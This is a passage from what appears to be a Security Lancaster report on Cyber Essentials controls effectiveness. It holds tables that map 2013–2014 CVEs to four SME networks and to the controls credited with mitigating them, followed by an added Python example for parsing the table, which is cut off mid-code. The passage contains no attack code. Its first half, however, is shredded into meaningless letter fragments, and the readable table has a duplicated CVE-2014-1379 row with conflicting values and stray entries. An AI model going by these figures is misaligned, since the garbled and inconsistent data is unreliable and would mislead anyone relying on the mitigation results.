0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
| CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE |
|---|---|---|---|---|---|---|---|
| CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie deletion) |
| CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install) |
| CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server) |
| CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management |
| CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration |
| CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management |
| CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management |
| CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management |
| CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls (include anti-DOS) |
| CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL |
| CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL |
| CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management |
| CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware |
| CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management |
| CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting) |
| CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management |
| CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware |
| CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control |
| CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control |
| CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control |
| CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing) |
| CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting |
| CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting |
| CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control |
| CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management |
| CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management |
| CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management |
| CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware |
| CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management |
| CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management |
| CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management |
| CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management |
| CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall |
| CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access) |
| CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DOS |
| CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting |
| CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access) |
| CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DOS |
| CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management |
| CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access) |
| CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall, Anti-DOS, Patch Management |
| CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access) |
| CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates |
| CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management |
| CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware |
| CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware |
| CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration |
| CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6369 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management |
| CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management |
| CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay] |
| CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay] |
| CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates |
| CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration |
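The applicability table is the raw material for the report's headline figures (how many of the sampled CVEs apply to each network, and what Cyber Essentials does about them). The following Python is an added worked example, not code from the report: it parses rows in the pipe-delimited layout used above and derives the per-network applicability counts, the number of CVEs each control is credited with mitigating, and the residual (not fully mitigated) CVEs per network. The eight embedded rows are copied from the table; the alias map that folds "Anti-Malware" into "Malware Protection" and "Website Blacklist" into "Website Blacklisting", and the choice to credit a control only where the With CE status is Mitigated or Partially Mitigated, are my assumptions.

```python
import re
from collections import Counter

# Constructed sample input: eight rows copied from the applicability table
# above, in the same pipe-delimited layout (the report ships the table only
# as rendered pages, so this is a hand-copied subset, not its data file).
SAMPLE_TABLE = """\
| CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE |
|---|---|---|---|---|---|---|---|
| CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie deletion) |
| CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install) |
| CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management |
| CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access) |
| CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DOS |
| CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware |
| CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay] |
"""

NETWORKS = ("SME1", "SME2", "SME3", "SME4", "Idealised")

# "With CE" cells read "<status> - <control>, <control> & <control>".
STATUS_RE = re.compile(r"^(Not Mitigated|Partially Mitigated|Mitigated)(?:\s+-\s+(.+))?$")

# Assumed alias map: the table spells the same control several ways.
ALIASES = {
    "Anti-Malware": "Malware Protection",
    "Website Blacklist": "Website Blacklisting",
    "Anti-DoS": "Anti-DOS",
}


def normalise_control(name):
    """Drop qualifiers such as "(Secure Browser)" or "[Time Delay]" and fold aliases."""
    name = re.sub(r"\s*[\(\[].*?[\)\]]", "", name).strip()
    return ALIASES.get(name, name)


def parse_with_ce(cell):
    """Split a With CE cell into (status, [normalised control names])."""
    m = STATUS_RE.match(cell.strip())
    if not m:
        raise ValueError(f"unrecognised With CE cell: {cell!r}")
    status, controls = m.group(1), m.group(2) or ""
    names = [normalise_control(c) for c in re.split(r",\s*|\s+&\s+", controls) if c.strip()]
    return status, names


def parse_table(text):
    """Parse the pipe table into row dicts; header and separator rows are skipped."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if cells[0] == "CVE" or set(cells[0]) <= {"-"}:
            continue
        if len(cells) != 8:
            raise ValueError(f"expected 8 columns: {line!r}")
        status, controls = parse_with_ce(cells[7])
        rows.append({
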